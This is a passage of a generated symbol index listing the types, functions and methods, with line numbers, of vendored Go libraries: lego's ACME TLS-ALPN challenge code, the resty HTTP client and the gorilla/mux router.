(line 43) | func (c *Challenge) Solve(authz acme.Authorization) error { function NewChallenge (line 30) | func NewChallenge(core *api.Core, validate ValidateFunc, provider challe... function ChallengeBlocks (line 75) | func ChallengeBlocks(domain, keyAuth string) ([]byte, []byte, error) { function ChallengeCert (line 117) | func ChallengeCert(domain, keyAuth string) (*tls.Certificate, error) { FILE: vendor/github.com/go-acme/lego/v3/challenge/tlsalpn01/tls_alpn_challenge_server.go constant ACMETLS1Protocol (line 15) | ACMETLS1Protocol = "acme-tls/1" constant defaultTLSPort (line 19) | defaultTLSPort = "443" type ProviderServer (line 25) | type ProviderServer struct method GetAddress (line 38) | func (s *ProviderServer) GetAddress() string { method Present (line 44) | func (s *ProviderServer) Present(domain, token, keyAuth string) error { method CleanUp (line 84) | func (s *ProviderServer) CleanUp(domain, token, keyAuth string) error { function NewProviderServer (line 34) | func NewProviderServer(iface, port string) *ProviderServer { FILE: vendor/github.com/go-acme/lego/v3/log/logger.go type StdLogger (line 12) | type StdLogger interface function Fatal (line 23) | func Fatal(args ...interface{}) { function Fatalf (line 29) | func Fatalf(format string, args ...interface{}) { function Print (line 35) | func Print(args ...interface{}) { function Println (line 41) | func Println(args ...interface{}) { function Printf (line 47) | func Printf(format string, args ...interface{}) { function Warnf (line 52) | func Warnf(format string, args ...interface{}) { function Infof (line 57) | func Infof(format string, args ...interface{}) { FILE: vendor/github.com/go-resty/resty/v2/client.go constant MethodGet (line 30) | MethodGet = "GET" constant MethodPost (line 33) | MethodPost = "POST" constant MethodPut (line 36) | MethodPut = "PUT" constant MethodDelete (line 39) | MethodDelete = "DELETE" constant MethodPatch (line 42) | MethodPatch = "PATCH" constant MethodHead (line 45) | MethodHead = "HEAD" constant MethodOptions (line 48) | MethodOptions = "OPTIONS" type RequestMiddleware (line 74) | type RequestMiddleware type ResponseMiddleware (line 77) | type ResponseMiddleware type PreRequestHook (line 80) | type PreRequestHook type RequestLogCallback (line 83) | type RequestLogCallback type ResponseLogCallback (line 86) | type ResponseLogCallback type ErrorHook (line 89) | type ErrorHook type SuccessHook (line 92) | type SuccessHook type Client (line 100) | type Client struct method SetHostURL (line 177) | func (c *Client) SetHostURL(url string) *Client { method SetBaseURL (line 192) | func (c *Client) SetBaseURL(url string) *Client { method SetHeader (line 209) | func (c *Client) SetHeader(header, value string) *Client { method SetHeaders (line 226) | func (c *Client) SetHeaders(headers map[string]string) *Client { method SetHeaderVerbatim (line 244) | func (c *Client) SetHeaderVerbatim(header, value string) *Client { method SetCookieJar (line 255) | func (c *Client) SetCookieJar(jar http.CookieJar) *Client { method SetCookie (line 267) | func (c *Client) SetCookie(hc *http.Cookie) *Client { method SetCookies (line 288) | func (c *Client) SetCookies(cs []*http.Cookie) *Client { method SetQueryParam (line 305) | func (c *Client) SetQueryParam(param, value string) *Client { method SetQueryParams (line 323) | func (c *Client) SetQueryParams(params map[string]string) *Client { method SetFormData (line 341) | func (c *Client) SetFormData(data map[string]string) *Client { method SetBasicAuth (line 360) | func (c *Client) SetBasicAuth(username, password string) *Client { method SetAuthToken (line 378) | func (c *Client) SetAuthToken(token string) *Client { method SetAuthScheme (line 401) | func (c *Client) SetAuthScheme(scheme string) *Client { method SetDigestAuth (line 418) | func (c *Client) SetDigestAuth(username, password string) *Client { method R (line 435) | func (c *Client) R() *Request { method NewRequest (line 456) | func (c *Client) NewRequest() *Request { method OnBeforeRequest (line 470) | func (c *Client) OnBeforeRequest(m RequestMiddleware) *Client { method OnAfterResponse (line 489) | func (c *Client) OnAfterResponse(m ResponseMiddleware) *Client { method OnError (line 512) | func (c *Client) OnError(h ErrorHook) *Client { method OnSuccess (line 524) | func (c *Client) OnSuccess(h SuccessHook) *Client { method OnInvalid (line 536) | func (c *Client) OnInvalid(h ErrorHook) *Client { method OnPanic (line 550) | func (c *Client) OnPanic(h ErrorHook) *Client { method SetPreRequestHook (line 559) | func (c *Client) SetPreRequestHook(h PreRequestHook) *Client { method SetDebug (line 574) | func (c *Client) SetDebug(d bool) *Client { method SetDebugBodyLimit (line 582) | func (c *Client) SetDebugBodyLimit(sl int64) *Client { method OnRequestLog (line 589) | func (c *Client) OnRequestLog(rl RequestLogCallback) *Client { method OnResponseLog (line 600) | func (c *Client) OnResponseLog(rl ResponseLogCallback) *Client { method SetDisableWarn (line 614) | func (c *Client) SetDisableWarn(d bool) *Client { method SetAllowGetMethodPayload (line 624) | func (c *Client) SetAllowGetMethodPayload(a bool) *Client { method SetLogger (line 632) | func (c *Client) SetLogger(l Logger) *Client { method SetContentLength (line 643) | func (c *Client) SetContentLength(l bool) *Client { method SetTimeout (line 651) | func (c *Client) SetTimeout(timeout time.Duration) *Client { method SetError (line 663) | func (c *Client) SetError(err interface{}) *Client { method SetRedirectPolicy (line 675) | func (c *Client) SetRedirectPolicy(policies ...interface{}) *Client { method SetRetryCount (line 697) | func (c *Client) SetRetryCount(count int) *Client { method SetRetryWaitTime (line 706) | func (c *Client) SetRetryWaitTime(waitTime time.Duration) *Client { method SetRetryMaxWaitTime (line 715) | func (c *Client) SetRetryMaxWaitTime(maxWaitTime time.Duration) *Client { method SetRetryAfter (line 722) | func (c *Client) SetRetryAfter(callback RetryAfterFunc) *Client { method SetJSONMarshaler (line 731) | func (c *Client) SetJSONMarshaler(marshaler func(v interface{}) ([]byt... method SetJSONUnmarshaler (line 740) | func (c *Client) SetJSONUnmarshaler(unmarshaler func(data []byte, v in... method SetXMLMarshaler (line 749) | func (c *Client) SetXMLMarshaler(marshaler func(v interface{}) ([]byte... method SetXMLUnmarshaler (line 758) | func (c *Client) SetXMLUnmarshaler(unmarshaler func(data []byte, v int... method AddRetryCondition (line 769) | func (c *Client) AddRetryCondition(condition RetryConditionFunc) *Clie... method AddRetryAfterErrorCondition (line 778) | func (c *Client) AddRetryAfterErrorCondition() *Client { method AddRetryHook (line 789) | func (c *Client) AddRetryHook(hook OnRetryFunc) *Client { method SetRetryResetReaders (line 798) | func (c *Client) SetRetryResetReaders(b bool) *Client { method SetTLSClientConfig (line 814) | func (c *Client) SetTLSClientConfig(config *tls.Config) *Client { method SetProxy (line 831) | func (c *Client) SetProxy(proxyURL string) *Client { method RemoveProxy (line 852) | func (c *Client) RemoveProxy() *Client { method SetCertificates (line 864) | func (c *Client) SetCertificates(certs ...tls.Certificate) *Client { method SetRootCertificate (line 877) | func (c *Client) SetRootCertificate(pemFilePath string) *Client { method SetRootCertificateFromString (line 900) | func (c *Client) SetRootCertificateFromString(pemContent string) *Clie... method SetOutputDirectory (line 919) | func (c *Client) SetOutputDirectory(dirPath string) *Client { method SetRateLimiter (line 928) | func (c *Client) SetRateLimiter(rl RateLimiter) *Client { method SetTransport (line 951) | func (c *Client) SetTransport(transport http.RoundTripper) *Client { method SetScheme (line 961) | func (c *Client) SetScheme(scheme string) *Client { method SetCloseConnection (line 970) | func (c *Client) SetCloseConnection(close bool) *Client { method SetDoNotParseResponse (line 981) | func (c *Client) SetDoNotParseResponse(parse bool) *Client { method SetPathParam (line 1000) | func (c *Client) SetPathParam(param, value string) *Client { method SetPathParams (line 1023) | func (c *Client) SetPathParams(params map[string]string) *Client { method SetRawPathParam (line 1052) | func (c *Client) SetRawPathParam(param, value string) *Client { method SetRawPathParams (line 1077) | func (c *Client) SetRawPathParams(params map[string]string) *Client { method SetJSONEscapeHTML (line 1087) | func (c *Client) SetJSONEscapeHTML(b bool) *Client { method EnableTrace (line 1104) | func (c *Client) EnableTrace() *Client { method DisableTrace (line 1112) | func (c *Client) DisableTrace() *Client { method IsProxySet (line 1119) | func (c *Client) IsProxySet() bool { method GetClient (line 1124) | func (c *Client) GetClient() *http.Client { method Clone (line 1137) | func (c *Client) Clone() *Client { method execute (line 1153) | func (c *Client) execute(req *Request) (*Response, error) { method tlsConfig (line 1255) | func (c *Client) tlsConfig() (*tls.Config, error) { method Transport (line 1270) | func (c *Client) Transport() (*http.Transport, error) { method outputLogTo (line 1278) | func (c *Client) outputLogTo(w io.Writer) *Client { method onErrorHooks (line 1301) | func (c *Client) onErrorHooks(req *Request, resp *Response, err error) { method onPanicHooks (line 1317) | func (c *Client) onPanicHooks(req *Request, err error) { method onInvalidHooks (line 1324) | func (c *Client) onInvalidHooks(req *Request, err error) { type User (line 159) | type User struct type ResponseError (line 1285) | type ResponseError struct method Error (line 1290) | func (e *ResponseError) Error() string { method Unwrap (line 1294) | func (e *ResponseError) Unwrap() error { type File (line 1335) | type File struct method String (line 1342) | func (f *File) String() string { type MultipartField (line 1351) | type MultipartField struct function createClient (line 1362) | func createClient(hc *http.Client) *Client { FILE: vendor/github.com/go-resty/resty/v2/digest.go type digestCredentials (line 40) | type digestCredentials struct type digestTransport (line 44) | type digestTransport struct method RoundTrip (line 49) | func (dt *digestTransport) RoundTrip(req *http.Request) (*http.Respons... method newCredentials (line 100) | func (dt *digestTransport) newCredentials(req *http.Request, c *challe... type challenge (line 117) | type challenge struct function parseChallenge (line 128) | func parseChallenge(input string) (*challenge, error) { type credentials (line 175) | type credentials struct method authorize (line 191) | func (c *credentials) authorize() (string, error) { method validateQop (line 229) | func (c *credentials) validateQop() error { method h (line 253) | func (c *credentials) h(data string) string { method resp (line 260) | func (c *credentials) resp() (string, error) { method kd (line 277) | func (c *credentials) kd(secret, data string) string { method ha1 (line 282) | func (c *credentials) ha1() string { method ha2 (line 292) | func (c *credentials) ha2() string { FILE: vendor/github.com/go-resty/resty/v2/middleware.go constant debugRequestLogKey (line 23) | debugRequestLogKey = "__restyDebugRequestLog" function parseRequestURL (line 29) | func parseRequestURL(c *Client, r *Request) error { function parseRequestHeader (line 162) | func parseRequestHeader(c *Client, r *Request) error { function parseRequestBody (line 181) | func parseRequestBody(c *Client, r *Request) error { function createHTTPRequest (line 211) | func createHTTPRequest(c *Client, r *Request) (err error) { function addCredentials (line 273) | func addCredentials(c *Client, r *Request) error { function requestLogger (line 310) | func requestLogger(c *Client, r *Request) error { function responseLogger (line 350) | func responseLogger(c *Client, res *Response) error { function parseResponseBody (line 380) | func parseResponseBody(c *Client, res *Response) (err error) { function handleMultipart (line 416) | func handleMultipart(c *Client, r *Request) error { function handleFormData (line 460) | func handleFormData(c *Client, r *Request) { function handleContentType (line 474) | func handleContentType(c *Client, r *Request) { function handleRequestBody (line 482) | func handleRequestBody(c *Client, r *Request) error { function saveResponseIntoFile (line 529) | func saveResponseIntoFile(c *Client, res *Response) error { function getBodyCopy (line 562) | func getBodyCopy(r *Request) (*bytes.Buffer, error) { FILE: vendor/github.com/go-resty/resty/v2/redirect.go type RedirectPolicy (line 26) | type RedirectPolicy interface type RedirectPolicyFunc (line 32) | type RedirectPolicyFunc method Apply (line 36) | func (f RedirectPolicyFunc) Apply(req *http.Request, via []*http.Reque... function NoRedirectPolicy (line 43) | func NoRedirectPolicy() RedirectPolicy { function FlexibleRedirectPolicy (line 52) | func FlexibleRedirectPolicy(noOfRedirect int) RedirectPolicy { function DomainCheckRedirectPolicy (line 66) | func DomainCheckRedirectPolicy(hostnames ...string) RedirectPolicy { function getHostname (line 87) | func getHostname(host string) (hostname string) { function checkHostAndAddHeaders (line 99) | func checkHostAndAddHeaders(cur *http.Request, pre *http.Request) { FILE: vendor/github.com/go-resty/resty/v2/request.go type Request (line 29) | type Request struct method Context (line 78) | func (r *Request) Context() context.Context { method SetContext (line 89) | func (r *Request) SetContext(ctx context.Context) *Request { method SetHeader (line 103) | func (r *Request) SetHeader(header, value string) *Request { method SetHeaders (line 119) | func (r *Request) SetHeaders(headers map[string]string) *Request { method SetHeaderMultiValues (line 136) | func (r *Request) SetHeaderMultiValues(headers map[string][]string) *R... method SetHeaderVerbatim (line 154) | func (r *Request) SetHeaderVerbatim(header, value string) *Request { method SetQueryParam (line 169) | func (r *Request) SetQueryParam(param, value string) *Request { method SetQueryParams (line 186) | func (r *Request) SetQueryParams(params map[string]string) *Request { method SetQueryParamsFromValues (line 205) | func (r *Request) SetQueryParamsFromValues(params url.Values) *Request { method SetQueryString (line 220) | func (r *Request) SetQueryString(query string) *Request { method SetFormData (line 245) | func (r *Request) SetFormData(data map[string]string) *Request { method SetFormDataFromValues (line 261) | func (r *Request) SetFormDataFromValues(data url.Values) *Request { method SetBody (line 312) | func (r *Request) SetBody(body interface{}) *Request { method SetResult (line 329) | func (r *Request) SetResult(res interface{}) *Request { method SetError (line 348) | func (r *Request) SetError(err interface{}) *Request { method SetFile (line 357) | func (r *Request) SetFile(param, filePath string) *Request { method SetFiles (line 371) | func (r *Request) SetFiles(files map[string]string) *Request { method SetFileReader (line 384) | func (r *Request) SetFileReader(param, fileName string, reader io.Read... method SetMultipartFormData (line 395) | func (r *Request) SetMultipartFormData(data map[string]string) *Request { method SetMultipartField (line 404) | func (r *Request) SetMultipartField(param, fileName, contentType strin... method SetMultipartFields (line 436) | func (r *Request) SetMultipartFields(fields ...*MultipartField) *Reque... method SetContentLength (line 449) | func (r *Request) SetContentLength(l bool) *Request { method SetBasicAuth (line 465) | func (r *Request) SetBasicAuth(username, password string) *Request { method SetAuthToken (line 479) | func (r *Request) SetAuthToken(token string) *Request { method SetAuthScheme (line 502) | func (r *Request) SetAuthScheme(scheme string) *Request { method SetDigestAuth (line 519) | func (r *Request) SetDigestAuth(username, password string) *Request { method SetOutput (line 546) | func (r *Request) SetOutput(file string) *Request { method SetSRV (line 558) | func (r *Request) SetSRV(srv *SRVRecord) *Request { method SetDoNotParseResponse (line 569) | func (r *Request) SetDoNotParseResponse(parse bool) *Request { method SetPathParam (line 594) | func (r *Request) SetPathParam(param, value string) *Request { method SetPathParams (line 617) | func (r *Request) SetPathParams(params map[string]string) *Request { method SetRawPathParam (line 646) | func (r *Request) SetRawPathParam(param, value string) *Request { method SetRawPathParams (line 671) | func (r *Request) SetRawPathParams(params map[string]string) *Request { method ExpectContentType (line 680) | func (r *Request) ExpectContentType(contentType string) *Request { method ForceContentType (line 688) | func (r *Request) ForceContentType(contentType string) *Request { method SetJSONEscapeHTML (line 696) | func (r *Request) SetJSONEscapeHTML(b bool) *Request { method SetCookie (line 711) | func (r *Request) SetCookie(hc *http.Cookie) *Request { method SetCookies (line 735) | func (r *Request) SetCookies(rs []*http.Cookie) *Request { method SetLogger (line 744) | func (r *Request) SetLogger(l Logger) *Request { method SetDebug (line 755) | func (r *Request) SetDebug(d bool) *Request { method AddRetryCondition (line 767) | func (r *Request) AddRetryCondition(condition RetryConditionFunc) *Req... method EnableTrace (line 788) | func (r *Request) EnableTrace() *Request { method TraceInfo (line 798) | func (r *Request) TraceInfo() TraceInfo { method Get (line 851) | func (r *Request) Get(url string) (*Response, error) { method Head (line 856) | func (r *Request) Head(url string) (*Response, error) { method Post (line 861) | func (r *Request) Post(url string) (*Response, error) { method Put (line 866) | func (r *Request) Put(url string) (*Response, error) { method Delete (line 871) | func (r *Request) Delete(url string) (*Response, error) { method Options (line 876) | func (r *Request) Options(url string) (*Response, error) { method Patch (line 881) | func (r *Request) Patch(url string) (*Response, error) { method Send (line 892) | func (r *Request) Send() (*Response, error) { method Execute (line 900) | func (r *Request) Execute(method, url string) (*Response, error) { method fmtBodyString (line 985) | func (r *Request) fmtBodyString(sl int64) (body string) { method selectAddr (line 1055) | func (r *Request) selectAddr(addrs []*net.SRV, path string, attempt in... method initValuesMap (line 1067) | func (r *Request) initValuesMap() { type SRVRecord (line 976) | type SRVRecord struct FILE: vendor/github.com/go-resty/resty/v2/response.go type Response (line 21) | type Response struct method Body (line 33) | func (r *Response) Body() []byte { method SetBody (line 47) | func (r *Response) SetBody(b []byte) *Response { method Status (line 55) | func (r *Response) Status() string { method StatusCode (line 65) | func (r *Response) StatusCode() int { method Proto (line 73) | func (r *Response) Proto() string { method Result (line 81) | func (r *Response) Result() interface{} { method Error (line 86) | func (r *Response) Error() interface{} { method Header (line 91) | func (r *Response) Header() http.Header { method Cookies (line 99) | func (r *Response) Cookies() []*http.Cookie { method String (line 107) | func (r *Response) String() string { method Time (line 118) | func (r *Response) Time() time.Duration { method ReceivedAt (line 126) | func (r *Response) ReceivedAt() time.Time { method Size (line 133) | func (r *Response) Size() int64 { method RawBody (line 142) | func (r *Response) RawBody() io.ReadCloser { method IsSuccess (line 150) | func (r *Response) IsSuccess() bool { method IsError (line 155) | func (r *Response) IsError() bool { method setReceivedAt (line 163) | func (r *Response) setReceivedAt() { method fmtBodyString (line 170) | func (r *Response) fmtBodyString(sl int64) string { FILE: vendor/github.com/go-resty/resty/v2/resty.go constant Version (line 17) | Version = "2.12.0" function New (line 20) | func New() *Client { function NewWithClient (line 28) | func NewWithClient(hc *http.Client) *Client { function NewWithLocalAddr (line 34) | func NewWithLocalAddr(localAddr net.Addr) *Client { FILE: vendor/github.com/go-resty/resty/v2/retry.go constant defaultMaxRetries (line 17) | defaultMaxRetries = 3 constant defaultWaitTime (line 18) | defaultWaitTime = time.Duration(100) * time.Millisecond constant defaultMaxWaitTime (line 19) | defaultMaxWaitTime = time.Duration(2000) * time.Millisecond type Option (line 24) | type Option type RetryConditionFunc (line 28) | type RetryConditionFunc type OnRetryFunc (line 31) | type OnRetryFunc type RetryAfterFunc (line 38) | type RetryAfterFunc type Options (line 41) | type Options struct function Retries (line 52) | func Retries(value int) Option { function WaitTime (line 59) | func WaitTime(value time.Duration) Option { function MaxWaitTime (line 66) | func MaxWaitTime(value time.Duration) Option { function RetryConditions (line 73) | func RetryConditions(conditions []RetryConditionFunc) Option { function RetryHooks (line 80) | func RetryHooks(hooks []OnRetryFunc) Option { function ResetMultipartReaders (line 88) | func ResetMultipartReaders(value bool) Option { function Backoff (line 96) | func Backoff(operation func() (*Response, error), options ...Option) err... function sleepDuration (line 172) | func sleepDuration(resp *Response, min, max time.Duration, attempt int) ... function jitterBackoff (line 206) | func jitterBackoff(min, max time.Duration, attempt int) time.Duration { function randDuration (line 227) | func randDuration(center time.Duration) time.Duration { function newRnd (line 236) | func newRnd() *rand.Rand { function resetFileReaders (line 242) | func resetFileReaders(files []*File) error { FILE: vendor/github.com/go-resty/resty/v2/trace.go type TraceInfo (line 23) | type TraceInfo struct type clientTrace (line 74) | type clientTrace struct method createContext (line 91) | func (t *clientTrace) createContext(ctx context.Context) context.Conte... FILE: vendor/github.com/go-resty/resty/v2/transport.go function createTransport (line 17) | func createTransport(localAddr net.Addr) *http.Transport { FILE: vendor/github.com/go-resty/resty/v2/transport112.go function createTransport (line 17) | func createTransport(localAddr net.Addr) *http.Transport { FILE: vendor/github.com/go-resty/resty/v2/transport_js.go function transportDialContext (line 15) | func transportDialContext(dialer *net.Dialer) func(context.Context, stri... FILE: vendor/github.com/go-resty/resty/v2/transport_other.go function transportDialContext (line 15) | func transportDialContext(dialer *net.Dialer) func(context.Context, stri... FILE: vendor/github.com/go-resty/resty/v2/util.go type Logger (line 31) | type Logger interface function createLogger (line 37) | func createLogger() *logger { type logger (line 44) | type logger struct method Errorf (line 48) | func (l *logger) Errorf(format string, v ...interface{}) { method Warnf (line 52) | func (l *logger) Warnf(format string, v ...interface{}) { method Debugf (line 56) | func (l *logger) Debugf(format string, v ...interface{}) { method output (line 60) | func (l *logger) output(format string, v ...interface{}) { type RateLimiter (line 72) | type RateLimiter interface function IsStringEmpty (line 83) | func IsStringEmpty(str string) bool { function DetectContentType (line 88) | func DetectContentType(body interface{}) string { function IsJSONType (line 108) | func IsJSONType(ct string) bool { function IsXMLType (line 113) | func IsXMLType(ct string) bool { function Unmarshalc (line 118) | func Unmarshalc(c *Client, ct string, b []byte, d interface{}) (err erro... type RequestLog (line 135) | type RequestLog struct type ResponseLog (line 143) | type ResponseLog struct function jsonMarshal (line 153) | func jsonMarshal(c *Client, r *Request, d interface{}) (*bytes.Buffer, e... function firstNonEmpty (line 168) | func firstNonEmpty(v ...string) string { function escapeQuotes (line 179) | func escapeQuotes(s string) string { function createMultipartHeader (line 183) | func createMultipartHeader(param, fileName, contentType string) textprot... function addMultipartFormField (line 201) | func addMultipartFormField(w *multipart.Writer, mf *MultipartField) error { function writeMultipartFormFile (line 211) | func writeMultipartFormFile(w *multipart.Writer, fieldName, fileName str... function addFile (line 232) | func addFile(w *multipart.Writer, fieldName, path string) error { function addFileReader (line 241) | func addFileReader(w *multipart.Writer, f *File) error { function getPointer (line 245) | func getPointer(v interface{}) interface{} { function isPayloadSupported (line 253) | func isPayloadSupported(m string, allowMethodGet bool) bool { function typeOf (line 257) | func typeOf(i interface{}) reflect.Type { function valueOf (line 261) | func valueOf(i interface{}) reflect.Value { function indirect (line 265) | func indirect(v reflect.Value) reflect.Value { function kindOf (line 269) | func kindOf(v interface{}) reflect.Kind { function createDirectory (line 273) | func createDirectory(dir string) (err error) { function canJSONMarshal (line 284) | func canJSONMarshal(contentType string, kind reflect.Kind) bool { function functionName (line 288) | func functionName(i interface{}) string { function acquireBuffer (line 292) | func acquireBuffer() *bytes.Buffer { function releaseBuffer (line 296) | func releaseBuffer(buf *bytes.Buffer) { type requestBodyReleaser (line 305) | type requestBodyReleaser struct method Close (line 322) | func (rr *requestBodyReleaser) Close() error { function newRequestBodyReleaser (line 311) | func newRequestBodyReleaser(respBody io.ReadCloser, reqBuf *bytes.Buffer... function closeq (line 331) | func closeq(v interface{}) { function silently (line 337) | func silently(_ ...interface{}) {} function composeHeaders (line 339) | func composeHeaders(c *Client, r *Request, hdrs http.Header) string { function sortHeaderKeys (line 347) | func sortHeaderKeys(hdrs http.Header) []string { function copyHeaders (line 356) | func copyHeaders(hdrs http.Header) http.Header { type noRetryErr (line 364) | type noRetryErr struct method Error (line 368) | func (e *noRetryErr) Error() string { function wrapNoRetryErr (line 372) | func wrapNoRetryErr(err error) error { function unwrapNoRetryErr (line 379) | func unwrapNoRetryErr(err error) error { FILE: vendor/github.com/gorilla/mux/context.go function contextGet (line 8) | func contextGet(r *http.Request, key interface{}) interface{} { function contextSet (line 12) | func contextSet(r *http.Request, key, val interface{}) *http.Request { FILE: vendor/github.com/gorilla/mux/middleware.go type MiddlewareFunc (line 11) | type MiddlewareFunc method Middleware (line 19) | func (mw MiddlewareFunc) Middleware(handler http.Handler) http.Handler { type middleware (line 14) | type middleware interface method Use (line 24) | func (r *Router) Use(mwf ...MiddlewareFunc) { method useInterface (line 31) | func (r *Router) useInterface(mw middleware) { function CORSMethodMiddleware (line 39) | func CORSMethodMiddleware(r *Router) MiddlewareFunc { function getAllMethodsForRoute (line 58) | func getAllMethodsForRoute(r *Router, req *http.Request) ([]string, erro... FILE: vendor/github.com/gorilla/mux/mux.go function NewRouter (line 24) | func NewRouter() *Router { type Router (line 46) | type Router struct method Match (line 138) | func (r *Router) Match(req *http.Request, match *RouteMatch) bool { method ServeHTTP (line 175) | func (r *Router) ServeHTTP(w http.ResponseWriter, req *http.Request) { method Get (line 216) | func (r *Router) Get(name string) *Route { method GetRoute (line 222) | func (r *Router) GetRoute(name string) *Route { method StrictSlash (line 245) | func (r *Router) StrictSlash(value bool) *Router { method SkipClean (line 258) | func (r *Router) SkipClean(value bool) *Router { method UseEncodedPath (line 269) | func (r *Router) UseEncodedPath() *Router { method NewRoute (line 279) | func (r *Router) NewRoute() *Route { method Name (line 288) | func (r *Router) Name(name string) *Route { method Handle (line 294) | func (r *Router) Handle(path string, handler http.Handler) *Route { method HandleFunc (line 300) | func (r *Router) HandleFunc(path string, f func(http.ResponseWriter, method Headers (line 307) | func (r *Router) Headers(pairs ...string) *Route { method Host (line 313) | func (r *Router) Host(tpl string) *Route { method MatcherFunc (line 319) | func (r *Router) MatcherFunc(f MatcherFunc) *Route { method Methods (line 325) | func (r *Router) Methods(methods ...string) *Route { method Path (line 331) | func (r *Router) Path(tpl string) *Route { method PathPrefix (line 337) | func (r *Router) PathPrefix(tpl string) *Route { method Queries (line 343) | func (r *Router) Queries(pairs ...string) *Route { method Schemes (line 349) | func (r *Router) Schemes(schemes ...string) *Route { method BuildVarsFunc (line 355) | func (r *Router) BuildVarsFunc(f BuildVarsFunc) *Route { method Walk (line 362) | func (r *Router) Walk(walkFn WalkFunc) error { method walk (line 375) | func (r *Router) walk(walkFn WalkFunc, ancestors []*Route) error { type routeConf (line 73) | type routeConf struct function copyRouteConf (line 98) | func copyRouteConf(r routeConf) routeConf { function copyRouteRegexp (line 122) | func copyRouteRegexp(r *routeRegexp) *routeRegexp { type WalkFunc (line 373) | type WalkFunc type RouteMatch (line 411) | type RouteMatch struct type contextKey (line 422) | type contextKey constant varsKey (line 425) | varsKey contextKey = iota constant routeKey (line 426) | routeKey function Vars (line 430) | func Vars(r *http.Request) map[string]string { function CurrentRoute (line 442) | func CurrentRoute(r *http.Request) *Route { function setVars (line 449) | func setVars(r *http.Request, val interface{}) *http.Request { function setCurrentRoute (line 453) | func setCurrentRoute(r *http.Request, val interface{}) *http.Request { function cleanPath (line 463) | func cleanPath(p string) string { function uniqueVars (line 481) | func uniqueVars(s1, s2 []string) error { function checkPairs (line 494) | func checkPairs(pairs ...string) (int, error) { function mapFromPairsToString (line 505) | func mapFromPairsToString(pairs ...string) (map[string]string, error) { function mapFromPairsToRegex (line 519) | func mapFromPairsToRegex(pairs ...string) (map[string]*regexp.Regexp, er... function matchInArray (line 536) | func matchInArray(arr []string, value string) bool { function matchMapWithString (line 546) | func matchMapWithString(toCheck map[string]string, toMatch map[string][]... function matchMapWithRegex (line 574) | func matchMapWithRegex(toCheck map[string]*regexp.Regexp, toMatch map[st... function methodNotAllowed (line 601) | func methodNotAllowed(w http.ResponseWriter, r *http.Request) { function methodNotAllowedHandler (line 607) | func methodNotAllowedHandler() http.Handler { return http.HandlerFunc(me... FILE: vendor/github.com/gorilla/mux/regexp.go type routeRegexpOptions (line 17) | type routeRegexpOptions struct type regexpType (line 22) | type regexpType constant regexpTypePath (line 25) | regexpTypePath regexpType = 0 constant regexpTypeHost (line 26) | regexpTypeHost regexpType = 1 constant regexpTypePrefix (line 27) | regexpTypePrefix regexpType = 2 constant regexpTypeQuery (line 28) | regexpTypeQuery regexpType = 3 function newRouteRegexp (line 41) | func newRouteRegexp(tpl string, typ regexpType, options routeRegexpOptio... type routeRegexp (line 154) | type routeRegexp struct method Match (line 174) | func (r *routeRegexp) Match(req *http.Request, match *RouteMatch) bool { method url (line 197) | func (r *routeRegexp) url(values map[string]string) (string, error) { method getURLQuery (line 228) | func (r *routeRegexp) getURLQuery(req *http.Request) string { method matchQueryString (line 241) | func (r *routeRegexp) matchQueryString(req *http.Request) bool { function braceIndices (line 247) | func braceIndices(s string) ([]int, error) { function varGroupName (line 271) | func varGroupName(idx int) string { type routeRegexpGroup (line 280) | type routeRegexpGroup struct method setMatch (line 287) | func (v routeRegexpGroup) setMatch(req *http.Request, m *RouteMatch, r... function getHost (line 334) | func getHost(r *http.Request) string { function extractVars (line 341) | func extractVars(input string, matches []int, names []string, output map... FILE: vendor/github.com/gorilla/mux/route.go type Route (line 17) | type Route struct method SkipClean (line 36) | func (r *Route) SkipClean() bool { method Match (line 41) | func (r *Route) Match(req *http.Request, match *RouteMatch) bool { method GetError (line 105) | func (r *Route) GetError() error { method BuildOnly (line 110) | func (r *Route) BuildOnly() *Route { method Handler (line 118) | func (r *Route) Handler(handler http.Handler) *Route { method HandlerFunc (line 126) | func (r *Route) HandlerFunc(f func(http.ResponseWriter, *http.Request)... method GetHandler (line 131) | func (r *Route) GetHandler() http.Handler { method Name (line 139) | func (r *Route) Name(name string) *Route { method GetName (line 152) | func (r *Route) GetName() string { method addMatcher (line 166) | func (r *Route) addMatcher(m matcher) *Route { method addRegexpMatcher (line 174) | func (r *Route) addRegexpMatcher(tpl string, typ regexpType) error { method Headers (line 239) | func (r *Route) Headers(pairs ...string) *Route { method HeadersRegexp (line 265) | func (r *Route) HeadersRegexp(pairs ...string) *Route { method Host (line 293) | func (r *Route) Host(tpl string) *Route { method MatcherFunc (line 309) | func (r *Route) MatcherFunc(f MatcherFunc) *Route { method Methods (line 325) | func (r *Route) Methods(methods ...string) *Route { method Path (line 353) | func (r *Route) Path(tpl string) *Route { method PathPrefix (line 369) | func (r *Route) PathPrefix(tpl string) *Route { method Queries (line 393) | func (r *Route) Queries(pairs ...string) *Route { method Schemes (line 420) | func (r *Route) Schemes(schemes ...string) *Route { method BuildVarsFunc (line 438) | func (r *Route) BuildVarsFunc(f BuildVarsFunc) *Route { method Subrouter (line 465) | func (r *Route) Subrouter() *Router { method URL (line 507) | func (r *Route) URL(pairs ...string) (*url.URL, error) { method URLHost (line 549) | func (r *Route) URLHost(pairs ...string) (*url.URL, error) { method URLPath (line 577) | func (r *Route) URLPath(pairs ...string) (*url.URL, error) { method GetPathTemplate (line 602) | func (r *Route) GetPathTemplate() (string, error) { method GetPathRegexp (line 616) | func (r *Route) GetPathRegexp() (string, error) { method GetQueriesRegexp (line 631) | func (r *Route) GetQueriesRegexp() ([]string, error) { method GetQueriesTemplates (line 650) | func (r *Route) GetQueriesTemplates() ([]string, error) { method GetMethods (line 668) | func (r *Route) GetMethods() ([]string, error) { method GetHostTemplate (line 685) | func (r *Route) GetHostTemplate() (string, error) { method prepareVars (line 697) | func (r *Route) prepareVars(pairs ...string) (map[string]string, error) { method buildVars (line 705) | func (r *Route) buildVars(m map[string]string) map[string]string { type matcher (line 161) | type matcher interface type headerMatcher (line 224) | type headerMatcher method Match (line 226) | func (m headerMatcher) Match(r *http.Request, match *RouteMatch) bool { type headerRegexMatcher (line 249) | type headerRegexMatcher method Match (line 251) | func (m headerRegexMatcher) Match(r *http.Request, match *RouteMatch) ... type MatcherFunc (line 301) | type MatcherFunc method Match (line 304) | func (m MatcherFunc) Match(r *http.Request, match *RouteMatch) bool { type methodMatcher (line 316) | type methodMatcher method Match (line 318) | func (m methodMatcher) Match(r *http.Request, match *RouteMatch) bool { type schemeMatcher (line 412) | type schemeMatcher method Match (line 414) | func (m schemeMatcher) Match(r *http.Request, match 